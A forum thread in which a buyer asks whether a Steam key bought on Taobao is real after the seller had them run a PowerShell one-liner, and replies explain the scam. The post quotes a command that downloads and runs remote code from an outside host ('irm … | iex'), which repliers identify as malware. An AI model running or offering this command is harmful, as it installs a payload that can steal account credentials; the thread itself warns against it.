help!I want to know if the CDK I bought is real.
I bought a CD-key in TaoBao shopping web. The seller let me run a code in powershell.
Here is the code: "irm steam-cdk.run | iex".
Then enter the cdk he gave me in the restarted steam.
But I realised something was wrong.
I want to know if the CDK I bought is real.
If it's not true, then what kind of cdk is real?
thx!

"irm" stands for Invoke Rest Method ( https://www.pdq.com/powershell/invoke-restmethod/ )
What it does is download a script from a specified website or address, which is this very odd link you put down apparently

Then the result of this action is then piped (the | ) to iex
"iex" stands for Invoke Expression, which means "run this script"

What you just did is extremely dangerous as such;
you're running someone else's code and have no clue what you just did.

It is a javascript based virus.
The command downloads an HTML Document that is instantly run and infects your system. I can't really test what it does exactly, but it's nothing good.

Even as just plain text, windows defender goes crazy and so I can't read it lol.

Do not run that command.

---

@OP please remove the command. It's unsafe.
Just saying, but for safety reasons I warned steam moderation of the content within your post as well. They might remove it all together when you decide not to remove the link; which would remove the thread.

Buy something shady from unreputable market, then result is what you asked for: unreputable result. Was it worth all the aftermath hassles? Probably not. But, you've learned your lesson for cheap payment. That is good.

Consider downloading and running Malwarebytes because it's most likely that person tricked you into downloading something you shouldn't have.
This must be fake, because I was also deceived. Games are not really saved to your game library, and there is a possibility of stealing your Steam password. This is a black industry chain
Remember to check the official Steam activation code before making a purchase next time
if you run some shady code from some shady guy you found on some shady site.. you deserve whatever outcome it might lead to.

but yeah, you never have to run any codes to get a CD key.
if you have to do anything else than paste a CD key into steams own product key activating feature, its most likely a scam and you should avoid it.
